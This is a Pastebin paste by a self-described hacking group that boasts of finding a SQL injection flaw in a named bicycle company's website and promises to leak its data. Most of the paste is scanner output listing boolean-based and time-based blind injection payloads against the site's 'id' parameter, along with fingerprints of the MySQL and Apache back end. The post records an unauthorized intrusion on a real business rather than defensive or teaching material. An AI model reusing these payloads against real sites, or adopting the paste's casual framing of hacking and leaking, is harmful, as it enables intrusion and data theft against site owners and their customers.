UnitedSecTeam

Leaked?

Oct 7th, 2017
138
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.30 KB | None | 0 0
  1. //////////////////////////////////////// ///////////////////////////////////////
  2. /////////////////////////////////////////////// UNITEDSECTEAM /////////////////////////////////////////////
  3. ///////////////////////////////////////Pesting your security since 2015 ///////////////////////////////////
  4.  
  5. www.DyantekBikes.com
  6.  
  7. We were planning on hacking a website for the night and we stumbled on this.I quickly called one of my friends and ask him to sniff through and find some good stuff.He found a sql vulnerable page.for those who dont know im hacking vulnerable websites as apart of the 'Wiseupweb' thingy to make small websites more smarter anyways after 10minutes i came upon that below.The only reason why i even hacked this website was because newyorktimes made a article on it and it had some serious looking partners in its industry.I will leaked the info soon so bye for now
  8.  
  9. Parameter: id (GET)
  10. Type: boolean-based blind
  11. Title: AND boolean-based blind - WHERE or HAVING clause
  12. Payload: id=10 AND 8503=8503
  13.  
  14. Type: AND/OR time-based blind
  15. Title: MySQL >= 5.0.12 AND time-based blind
  16. Payload: id=10 AND SLEEP(5)
  17. ---
  18. [21:57:15] [INFO] the back-end DBMS is MySQL
  19. web application technology: Apache
  20. back-end DBMS: MySQL >= 5.0.12
Advertisement
Add Comment
Please, Sign In to add comment